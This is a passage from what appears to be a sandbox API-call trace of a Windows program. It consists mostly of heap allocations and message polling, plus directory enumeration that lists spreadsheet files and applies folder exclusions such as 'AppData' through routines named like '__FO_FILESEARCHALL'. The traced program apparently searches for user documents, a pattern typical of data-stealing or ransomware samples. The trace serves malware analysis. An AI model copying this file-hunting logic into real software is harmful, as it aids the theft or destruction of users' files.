lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.096] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0074.096] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.096] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0074.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0074.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0074.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bf0 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.096] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0e05420, ftCreationTime.dwHighDateTime=0x1d5da04, ftLastAccessTime.dwLowDateTime=0x508ab760, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0x508ab760, ftLastWriteTime.dwHighDateTime=0x1d5deb6, nFileSizeHigh=0x0, nFileSizeLow=0x14fb7, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="Pwvig6N-.xls", cAlternateFileName="")) returned 1 [0074.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0074.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bf0 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0074.096] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bf0 [0074.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.096] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.097] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bf0 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0074.097] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bf0 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bd0 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0074.097] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.097] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764cc0 | out: hHeap=0x650000) returned 1 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0074.098] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0074.098] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.098] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0074.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0074.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bf0 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.098] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843dbca0, ftCreationTime.dwHighDateTime=0x1d59ce5, ftLastAccessTime.dwLowDateTime=0xe379aeb0, ftLastAccessTime.dwHighDateTime=0x1d59de2, ftLastWriteTime.dwLowDateTime=0xe379aeb0, ftLastWriteTime.dwHighDateTime=0x1d59de2, nFileSizeHigh=0x0, nFileSizeLow=0x13c5c, dwReserved0=0x10, dwReserved1=0x657690, cFileName="uKjh6aasKg.xlsx", cAlternateFileName="UKJH6A~1.XLS")) returned 1 [0074.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0074.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0074.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bf0 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0074.098] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bf0 [0074.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.098] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.098] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.098] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bf0 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0074.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0074.099] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bf0 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0074.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bd0 [0074.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0074.099] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xf0) returned 0x6bb0c0 [0074.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764cc0 | out: hHeap=0x650000) returned 1 [0074.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0074.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0074.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0074.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.099] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0074.100] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0074.100] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.100] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0074.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0074.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0074.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bf0 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.100] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6050f080, ftCreationTime.dwHighDateTime=0x1d5dbad, ftLastAccessTime.dwLowDateTime=0x156f28d0, ftLastAccessTime.dwHighDateTime=0x1d5e282, ftLastWriteTime.dwLowDateTime=0x156f28d0, ftLastWriteTime.dwHighDateTime=0x1d5e282, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="x6khSA9uDUZMBxf", cAlternateFileName="X6KHSA~1")) returned 1 [0074.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0074.100] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0074.100] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.100] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.100] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.101] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.101] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0074.101] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.101] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c60 | out: hHeap=0x650000) returned 1 [0074.101] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf", cchCount1=15, lpString2="AppData", cchCount2=7) returned 3 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.101] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0074.101] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b858 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df40 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0074.101] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dea0 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.102] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.102] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764cc0 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b480 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b390 | out: hHeap=0x650000) returned 1 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b390 | out: hHeap=0x650000) returned 1 [0074.102] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b540 | out: hHeap=0x650000) returned 1 [0074.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b4c8 | out: hHeap=0x650000) returned 1 